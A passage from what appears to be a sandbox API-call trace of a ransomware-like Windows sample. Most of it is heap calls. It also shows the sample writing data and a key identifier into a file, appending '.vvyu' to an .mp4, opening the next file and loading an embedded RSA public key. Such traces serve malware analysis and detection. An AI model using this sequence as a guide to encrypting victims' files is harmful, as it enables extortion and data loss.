[0200.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0200.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea33f8 [0200.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3398 | out: hHeap=0x620000) returned 1 [0200.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3398 [0200.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33b0 | out: hHeap=0x620000) returned 1 [0200.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0200.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0200.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0200.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0200.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0200.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3368 | out: hHeap=0x620000) returned 1 [0200.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3368 [0200.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0200.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0200.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33c8 | out: hHeap=0x620000) returned 1 [0200.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0200.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33f8 | out: hHeap=0x620000) returned 1 [0200.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0200.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0200.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0200.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0200.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0200.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3368 | out: hHeap=0x620000) returned 1 [0200.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0200.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0200.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0200.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0200.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0200.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0200.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0200.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0200.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0200.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0200.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0200.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0200.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3398 | out: hHeap=0x620000) returned 1 [0200.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0200.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33e0 | out: hHeap=0x620000) returned 1 [0200.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0200.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3380 | out: hHeap=0x620000) returned 1 [0200.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3350 | out: hHeap=0x620000) returned 1 [0200.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0200.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0200.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0200.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3338 | out: hHeap=0x620000) returned 1 [0200.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8fa98 | out: hHeap=0x620000) returned 1 [0200.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0200.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0200.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0200.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0200.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0200.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0200.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0200.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0200.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0200.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0200.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0200.732] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x115b6, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x115b6, lpOverlapped=0x0) returned 1 [0200.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0200.733] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x115bb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.733] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0200.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0200.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4998 [0200.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0200.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0200.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0200.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4998 | out: hHeap=0x620000) returned 1 [0200.735] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0200.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0200.735] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0200.735] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0200.735] CloseHandle (hObject=0x510) returned 1 [0200.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x2c2df40 [0200.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x2ea6a68 [0200.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c2df40 | out: hHeap=0x620000) returned 1 [0200.738] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\GW5kXQqybZPUP2d4.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\uovhosbqk0emsw0c\\gw5kxqqybzpup2d4.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\GW5kXQqybZPUP2d4.mp4.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\uovhosbqk0emsw0c\\gw5kxqqybzpup2d4.mp4.vvyu")) returned 1 [0200.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0200.739] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0200.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6e2d18 | out: hHeap=0x620000) returned 1 [0200.742] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd734870, ftCreationTime.dwHighDateTime=0x1d8a072, ftLastAccessTime.dwLowDateTime=0x5d9b3590, ftLastAccessTime.dwHighDateTime=0x1d8a571, ftLastWriteTime.dwLowDateTime=0x5d9b3590, ftLastWriteTime.dwHighDateTime=0x1d8a571, nFileSizeHigh=0x0, nFileSizeLow=0xf8cd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="powW2.png", cAlternateFileName="")) returned 1 [0200.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91678 [0200.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd6) returned 0x6e2d18 [0200.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91678 | out: hHeap=0x620000) returned 1 [0200.743] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\powW2.png") returned=".png" [0200.743] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\powW2.png" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\uovhosbqk0emsw0c\\poww2.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0200.744] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=63693) returned 1 [0200.744] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0200.746] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xf8a7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.746] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0200.748] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0200.748] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xf8cd, lpOverlapped=0x0) returned 1 [0200.749] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0200.750] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.750] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.750] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c300) returned 1 [0200.751] CryptCreateHash (in: hProv=0x67c300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0200.751] CryptHashData (hHash=0x2cfe0c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0200.751] CryptGetHashParam (in: hHash=0x2cfe0c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0200.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0200.751] CryptGetHashParam (in: hHash=0x2cfe0c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0200.751] GetLastError () returned 0x0 [0200.751] CryptDestroyHash (hHash=0x2cfe0c0) returned 1 [0200.751] CryptReleaseContext (hProv=0x67c300, dwFlags=0x0) returned 1 [0200.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0200.752] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0200.752] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0200.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0200.752] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0200.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0200.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0200.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xf8d0) returned 0x2ea99b0 [0200.752] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0200.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0200.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0200.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0200.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0200.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0200.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fa98 [0200.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3338 [0200.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fae0 [0200.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3350 [0200.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3380 [0200.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33e0 [0200.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3398 [0200.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0200.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0200.753] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0200.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0200.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3380 | out: hHeap=0x620000) returned 1 [0200.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3398 | out: hHeap=0x620000) returned 1 [0200.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33e0 | out: hHeap=0x620000) returned 1 [0200.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0200.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33e0 [0200.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0200.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3398 [0200.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0200.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3380 [0200.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0200.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0200.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0200.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0200.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0200.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0200.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0200.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0200.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0200.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3398 | out: hHeap=0x620000) returned 1 [0200.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0200.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3380 | out: hHeap=0x620000) returned 1 [0200.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0200.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0200.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33e0 | out: hHeap=0x620000) returned 1 [0200.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0200.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0200.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0200.757] GetCurrentThreadId () returned 0x66c [0200.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0200.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea8238 [0200.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0200.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0200.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0200.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0200.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0200.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0200.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.758] GetCurrentThreadId () returned 0x66c [0200.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0200.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0200.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0200.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0200.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0200.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0200.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0200.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0200.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33e0 [0200.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0200.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0200.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0200.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0200.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0200.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0200.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0200.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0200.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3380 [0200.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0200.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0200.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0200.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0200.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0200.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 